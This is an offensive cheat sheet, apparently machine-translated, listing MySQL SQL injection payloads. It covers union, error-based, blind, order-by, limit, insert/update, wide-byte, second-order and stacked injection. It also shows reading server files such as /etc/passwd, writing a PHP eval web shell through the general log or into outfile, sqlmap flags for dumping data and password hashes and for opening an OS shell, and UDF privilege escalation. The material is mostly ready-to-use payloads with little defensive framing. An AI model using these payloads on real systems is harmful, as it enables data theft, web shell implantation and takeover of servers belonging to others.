Common methods of SQL injection and udf privilege escalation
- SQL injection summary
- 1. Joint Injection
- 2. Error injection
- 3.blind note
- 4.order by injection
- 5.limit injection
- 6.insert / update injection
- 7. Wide byte injection
- 8. Secondary injection
- 9. Stack injection
- 10. Use of osshell after SQL injection
- 11.File writing after SQL injection
- 12.sqlmap common syntax
- 13.sql injection of udf for privilege escalation
SQL injection summary
1. Joint Injection
order by to determine the number of fields or through union select 1, 2, 3. . . . . To determine the number of fields and the output position
Get the current database union select 1, database ()--
Get table union select 1, group_concat (table_name) from information_schema.tables where table_schema = database ()--
Get the field names in the table union select 1, group_concat (column_name) from information_schema.columns where table_name = ''--
2. Error injection
select count(*),(concat(floor(rand(0)*2),(select version())))x from user group by x;
select * from xxx where id=‘12’ or extractvalue(1,concat(user(),0x7e,version()))
select * from xxx where id=‘12’ or updatexml(1,concat(user(),0x7e,version()),1)
3.blind note
3.1 Boolean blind
After guessing the length of the solution, one by one, the ascii guess solution is judged by returning different results.
select * from xxx where id=‘12’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=109
select ascii(substr(database(),1,1))=100;
3.2 Time blind
After guessing the length of the solution, one by one, the ascii guess is determined by returning different times.
select * from xxx where id=‘12’ and if(ascii(substr((select table_name from information_schema.tables
where table_schema=database() limit 0,1),1,1 )) > 120,sleep(2),NULL)
4.order by injection
select * from xxx order by updatexml(1,if(1=1,1,user()),1)
select * from xxx order by IF(1=1,1,(select+1+union+select+2))
select * from xxx order by (select+1+regexp+if(1=1,1,0x00))
select * from xxx order by extractvalue(1,if(1=1,1,user()))
select * from xxx order by if(1=1,1,(SELECT(1)FROM(SELECT(SLEEP(2)))test))
5.limit injection
5.1 There is no order by
In this case, the limit can be used to perform joint query injection after
execution.
5.2 order by
This method is suitable for version 5.0.0 <MySQL <5.6.6, injection after the limit statement
select id from users order by id limit 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(if(mid(version(),1,1) like 5, BENCHMARK(5000000,SHA1(1)),1))))),1)
6.insert / update injection
It can be injected by inserting data to get the echo, or by combining error injection
update xxx set id=‘1‘ | select conv(hex(substr((select table_name from information_schema.tables where table_schema=schema() limit 0,1),1 + (n-1) * 8, 8n)), 16, 10);
insert into users values (17,‘james’, ‘bond’|conv(hex(substr(user(),1 + (n-1) * 8, 8 n)),16, 10);
## Note, the above method does not necessarily take effect in the higher version of mysql
update xxx set id=‘xx’+(select conv(hex(substr(user(),1 + (n-1) * 8, 8* n)),16, 10);)+‘xx‘
7. Wide byte injection
In some cases, the database uses gbk encoding, so that we can bypass the addslashes function
Input data: username =% df% 27or% 201 = 1% 23 & password = 123
After processing: username =% df% 5c% 27or% 201 = 1% 23 & password = 123
When querying the database: select * from users where username = '运' or 1 = 1 # 'and password =' 123 ';
8. Secondary injection
When the background inserts the data we inserted, but the data queried from the database is directly put into the SQL statement for execution, which may cause secondary injection
Our registered user name is 123 'and it becomes 123 \' after being escaped by addlashes or is it 123 'stored in the database? When the backend is querying with our user name, we will get select * from xxx where id = '12' ' Resulting in secondary injection
9. Stack injection
When we use sql statement, we can select * from users where id = 1; select 1,2,3;
To implement the execution of two statements
10. Use of osshell after SQL injection
When using sqlmap, you can use osshell parameters to implement system commands. Under mysq, we must know the absolute directory of the website and have write permissions to the website directory. Because in the environment of php and mysql, osshell generates a php file on the website Execute commands in the root directory, so the above conditions are indispensable
11.File writing after SQL injection
11.1 Requirements
secure-file-priv is a system variable that restricts file read / write functions. details as follows:
No content means unlimited.
NULL means that file read / write is prohibited.
It is a directory name, indicating that only files in a specific directory are allowed to be read / written.
Note: The default value of 5.5.53 itself and later versions is NULL, and the previous version has no content.
There are three ways to view the current value of secure-file-priv:
select @@secure_file_priv;
select @@global.secure_file_priv;
show variables like “secure_file_priv”;
修改:
By modifying the my.ini file, add: secure-file-priv =
Start item add parameters: mysqld.exe --secure-file-priv =
11.2 Reading
Mysql usually reads the file using load_file function, the syntax is as follows:
select load_file (file_path);
The second method of reading files:
load data infile “/ etc / passwd” into table test FIELDS TERMINATED BY '\ n'; #Read the server file The
third type:
load data local infile “/ etc / passwd” into table test FIELDS TERMINATED BY '\ n'; #Read client files
Limitations:
The first two require secure-file-priv with no value or a favorable directory.
All need to know the absolute path of the file to be read.
The file size to be read must be less than the value set by max_allowed_packet
11.3 Write
By setting the mysql log directory
set global general_log=on;set global general_log_file=‘C:/phpStudy/WWW/123.php’;select ‘<?php eval($_POST[123]) ?>’;
The set command needs to be used in stack injection in sql injection, not available in query injection
into outfile / into dumpfile
select ‘<? phpinfo(); ?>’ into outfile ’c:/123.php‘;
11.4 Expansion
Mysql Client arbitrary file reading attack chain expansion
This can be used directly in the mysql client, but when using php for database connection, in addition to connecting to the database and need to perform a query operation, the reproduction fails under php7.3.4, and the reproduction succeeds under php5.4
12.sqlmap common syntax
sqlmap.py
-u to specify a connection url, url must have a ?xx=xxjob
-l Followed by a log file, which can be the log file of a proxy such as burp
-m Followed by a txt file, there are multiple URLs in the file, sqlmap will automatically detect all the URLs
-r You can save a post request packet in a txt, sqlmap will detect the target by post
--method=METHOD Specify whether it is get method or post method
--data=DATA Indicate which parameters are
--cookie=COOKIE Specify the cookie used in the test
--user-agent=AGENT Specify a user-agent value for testing
--random-agent Test with random user-agent
--referer=REFERER Specify the refere field in the http packet
-p TESTPARAMETER Know the test parameters
--level=LEVEL Set the test level
–String = STRING` In Boolean-based injection, sometimes the returned pages are one at a time, we need to determine the mark that marks the return to the correct page ourselves, and we will judge the true and false according to the mark (string) of the content returned , You can use this parameter to specify what character string you see is true. .
--technique=TECH Specify the technology used (B: Boolean blind injection; E: error injection; U: joint query injection; S: file system, operating system, registry related injection; T: time blind injection; all are used by default)
–Time-sec = TIMESEC` When blind-based time-based injection, specify the judgment time, in seconds, the default is 5 seconds.
--Union-cols = UCOLS the number of attempted columns of the union query
--current-user Current user
--current-db Current database
--Is-dba is dba
--Users query which users are in total
--Passwords query user password hashes
--dbs What database is in the target server
--tables What tables are in the target database
--columns What columns are in the target table
–Dump This will not be explained
–Sql-query = QUERY` execute a sql statement.
–Sql-shell` Create a sql shell.
--os-shell Create a shell for the other operating system and execute system commands remotely.
13.sql injection of udf for privilege escalation
UDF (user defined function) user-defined function is an extended interface of mysql. Users can implement functions that cannot be easily implemented in mysql through custom functions. The new functions they add can be called in sql statements, just like calling native functions.
Conditions for
elevation of udf under windows If the mysql version is greater than 5.1, the udf.dll file must be placed in the lib \ plugin folder of the mysql installation directory /
If the mysql version is less than 5.1, the udf.dll file is placed in c under windows server 2003: \ windows \ system32 directory, placed in c: \ winnt \ system32 directory under windows server 2000.
Master the account of the mysql database, and have the insert and delete permissions on mysql to create and discard functions.
Have permission to write udf.dll to the corresponding directory.
select Host, user, plugin from mysql.user where user = substring_index (user (), '@', 1);
when the value of plugin is empty, the privilege cannot be lifted
when the value of plugin is mysql_native_password.
udf.dll can be found in sqlmap, there are 32 and 64 under sqlmap / udf / mysql / windows, the number of bits here is the number of bits of mysql, not the number of bits of the other system
udf.dll in sqlmap is encoded Yes, you need to decode first, the decoding tool is in sqlmap / extra / cloak / cloak.py
In the elevation of privilege, we can only use the functions present in the dll file
